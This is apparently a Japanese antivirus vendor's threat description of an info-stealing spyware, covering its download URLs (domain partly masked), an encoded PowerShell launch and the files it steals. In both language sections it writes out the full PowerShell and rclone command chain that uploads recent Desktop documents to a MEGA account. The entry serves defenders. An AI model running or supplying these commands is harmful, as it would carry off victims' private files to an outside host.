TrojanSpy.JS.INFOSTEALER.B

スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

スパイウェアは、ワーム活動の機能を備えていません。

スパイウェアは、バックドア活動の機能を備えていません。

スパイウェアは、感染コンピュータや感染ユーザから特定の情報を収集します。

侵入方法

スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

スパイウェアは、以下のプロセスを追加します。

• powershell -enc {encrypted payload}

感染活動

スパイウェアは、ワーム活動の機能を備えていません。

バックドア活動

スパイウェアは、バックドア活動の機能を備えていません。

ルートキット機能

スパイウェアは、ルートキット機能を備えていません。

ダウンロード活動

スパイウェアは、以下のURLからファイルをダウンロードします。スパイウェアは、ファイルが感染コンピュータ内に保存されると、ファイル名を変更します。

• %User Temp%\document.pdf
• %User Temp%\a.zip

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。)

スパイウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

• https://{BLOCKED}lldogs.com/uploads/HZPV78IN74/document.pdf
• https://{BLOCKED}lldogs.com/uploads/HZPV78IN74/a.zip

情報漏えい

スパイウェアは、以下の情報を収集します。

• Files from the %Desktop% with the following extensions/patterns:
  • *.doc
  • *.docx
  • *.pd*
  • *.txt
• The files must be up to 2 years old

(註：%Desktop%フォルダは、現在ログオンしているユーザのデスクトップです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Desktop" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\Desktop" です。)

情報収集

スパイウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。

• https://g.api.mega.co.nz/cs?id={sessionId}

その他

スパイウェアは、以下を実行します。

• After downloading the zip file (%User Temp%/a.zip), it will execute the following powershell commands:
  • Expand-Archive $f -DestinationPath ./ → extracts the file inside a.zip (l.exe)
  • Copy-Item -Path .\l.exe -Destination $ENV:USERPROFILE; → the extracted file (l.exe) is copied to the %User Profile% folder
  • .\l.exe config create remote mega user {email} pass {password} →l.exe is a copy of rclone, which is a legitimate cloud sync tool but can be abused for data theft
  • .\l.exe copy --max-age 2y $ENV:USERPROFILE\Desktop\ remote:backup -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 --bwlimit 100M --include "*.doc" --include "*.docx" --include "*.pd*" --include "*.txt" -P → uploads files that match the patterns to a MEGA url

(註：%User Profile%フォルダは、現在ログオンしているユーザのプロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞" です。)

マルウェアは、脆弱性を利用した感染活動を行いません。

<補足>
インストール

スパイウェアは、以下のプロセスを追加します。

• powershell -enc {暗号化されたペイロード}

情報漏えい

スパイウェアは、以下の情報を収集します。

• %Desktop%内で、以下の拡張子/パターンを持つファイル
  • *.doc
  • *.docx
  • *.pd*
  • *.txt
• 2年以内に作成されたファイルが対象となります。

情報収集

スパイウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。

• https://g.api.mega.co.nz/cs?id={セッションID}

その他

スパイウェアは、以下を実行します。

• ZIPファイル（%User Temp%/a.zip）をダウンロードした後、以下のPowerShellコマンドを実行します。
  • Expand-Archive $f -DestinationPath ./ → a.zip（l.exe）内のファイルを抽出する
  • Copy-Item -Path .\l.exe -Destination $ENV:USERPROFILE; → 抽出されたファイル（l.exe）を%User Profile%フォルダにコピーする
  • .\l.exe config create remote mega user {電子メールアドレス} pass {パスワード} → l.exeは、rcloneのコピーです（rcloneは、正規のクラウド同期ツールですが、データ窃取に悪用される可能性があります。）。
  • .\l.exe copy --max-age 2y $ENV:USERPROFILE\Desktop\ remote:backup -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 --bwlimit 100M --include "*.doc" --include "*.docx" --include "*.pd*" --include "*.txt" -P → パターンに一致するファイルをMEGA URLにアップロードする